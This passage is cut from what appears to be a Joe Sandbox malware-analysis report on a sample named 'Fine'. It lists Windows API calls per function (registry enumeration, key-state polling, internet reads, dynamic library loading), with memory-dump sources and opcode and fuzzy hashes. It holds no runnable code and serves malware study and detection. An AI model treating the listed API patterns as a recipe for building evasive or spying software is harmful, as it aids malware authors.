                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DA1BE71A04301AFE720DF24C886B2AB7E5AF54710F54885DF9999B3D2DBB1EC44CB81
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0025C10E,?,?), ref: 0025D415
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D451
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4C8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4FE
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025C505
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0025C560
                                                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0025C5C3
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0025C606
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025C613
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fcd5a71b7f6586ce78969544b7a22f620464944a6b8a0a3efd791f18100428b4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 817647ebbc8db5762605bc83ef2015635cd4f28152995fe8f9acd3059b62e972
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcd5a71b7f6586ce78969544b7a22f620464944a6b8a0a3efd791f18100428b4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8619031218341AFC714DF54C890E2ABBE5FF84308F64855DF4569B292EB31ED49CB91
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0023D7CD,?), ref: 0023E714
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0023D7CD,?), ref: 0023E72D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023EAB0: GetFileAttributesW.KERNEL32(?,0023D840), ref: 0023EAB1
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0023ED8A
                                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0023EDC3
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023EF02
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023EF1A
                                                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0023EF67
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 86d61e69f11ff16828695879477c869bbd465c391f27e926541adfd9c10a819f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 117ecd55d7b6076569d81e48db648a0bba69858c6e71bec43c713ece8f6e0e6b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86d61e69f11ff16828695879477c869bbd465c391f27e926541adfd9c10a819f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E55162F25183499BCB24EB90D8919DFB3ECAF95340F00092EF68583191EF71A69C8B56
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00239534
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 002395A5
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00239604
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00239677
                                                                                                                                                                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002396A2
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b0bab09607d951ecfe6d1b504bdd055545ec5772e0f75208fa9ae6c322145345
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0af4f57a83f33a28436236e30c861f9e4a68926d849662ff99d18cae7c02b762
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0bab09607d951ecfe6d1b504bdd055545ec5772e0f75208fa9ae6c322145345
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 065159B5A10219EFCB10CF68D884AAAB7F8FF89310F158559E905DB310E770E961CF90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002495F3
                                                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0024961F
                                                                                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00249677
                                                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0024969C
                                                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002496A4
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0025999D
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00259A2D
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00259A49
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00259A8F
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00259AAF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00241A02,?,7529E610), ref: 001EF9F1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00230354,00000000,00000000,?,?,00241A02,?,7529E610,?,00230354), ref: 001EFA18
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0026766B
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00267682
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002676AB
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0024B5BE,00000000,00000000), ref: 002676D0
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 002676FF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 001D19E1
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 001D19FE
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 001D1A23
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 001D1A3D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1e225ed07dcc8ec9494867d679fb62e3f482f554c2df09ce38249a7c0abd3e38
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5e3b27093520dc45de061a3950f6e208aca2fadf57e6df4d4a7ee633827eba98
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e225ed07dcc8ec9494867d679fb62e3f482f554c2df09ce38249a7c0abd3e38
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59416D71A0414AFFDF15DF64C844BEEB7B5FB15324F20821AE429A3290C7706EA4CBA1
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00232262
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 0023230E
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00232316
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00232327
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0023232F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3b27d91547ad9f7087aa1924e333833c2dda045977104394abbe835b18418a43
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a9acc9d52da07b2ad91cf8d2060c2ef28e46a17f19bef4892f3899a67aea63ab
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b27d91547ad9f7087aa1924e333833c2dda045977104394abbe835b18418a43
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1931B3B1A1021AEFDB14CFA8DD89ADE3BB5EB04315F108255F925AB2D0C7B09954DB90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0024CC63,00000000), ref: 0024D97D
                                                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 0024D9B4
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,0024CC63,00000000), ref: 0024D9F9
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0024CC63,00000000), ref: 0024DA0D
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0024CC63,00000000), ref: 0024DA37
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c964ff3e5e273fd17530cefd6798c9bfad7df8bff22862701ec51bf6b94aa50f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: da2d5f12e2e7e00507c617c92e1df0264ff41eacd8147a2fd7c6ca36e624975b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c964ff3e5e273fd17530cefd6798c9bfad7df8bff22862701ec51bf6b94aa50f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D318F71A24209EFDB28DFA5E884AAFB7F8EF14350B10842EE546D2251D770EE50DB60
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002661E4
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0026623C
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0026624E
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00266259
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002662B5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f41a91921694b9ef90fa563bef41b2df04d33bef82bb23a5e9d3eed9a2fc507b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7f2346904c6de0d4f15fe7ae6cc3b9015d83d40f42cc47be67111856c6294aa8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f41a91921694b9ef90fa563bef41b2df04d33bef82bb23a5e9d3eed9a2fc507b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE2193319202199BDB119FA4DC88AEEB7B8EB05724F108256FA25EA180D7B499D5CF90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 002513AE
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 002513C5
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00251401
                                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 0025140D
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00251445
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1910b144a57bdeaebc7ab897bedd348415358427a78f94b3cdbd68dd97e3609b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 733d2b523bc1149f4fb1c0daf0d4c4656ee57b6e3767ee5bc9106d21d56ef59d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1910b144a57bdeaebc7ab897bedd348415358427a78f94b3cdbd68dd97e3609b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B218E36A00208EFD704EF65DC98A9EB7F9EF88305B048469F84A97761CB70AC44CF90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0020D146
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020D169
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00203B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001F6A79,?,0000015D,?,?,?,?,001F85B0,000000FF,00000000,?,?), ref: 00203BC5
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0020D18F
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020D1A2
                                                                                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0020D1B1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6014fb102f2b9eac608861677f23dd619dac8400cc1c348556e9c38591a1b10f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2a9ec21caa96571d8ac5a9dc7ade068512caff746d07fddb9e29f1e40c3ae9de
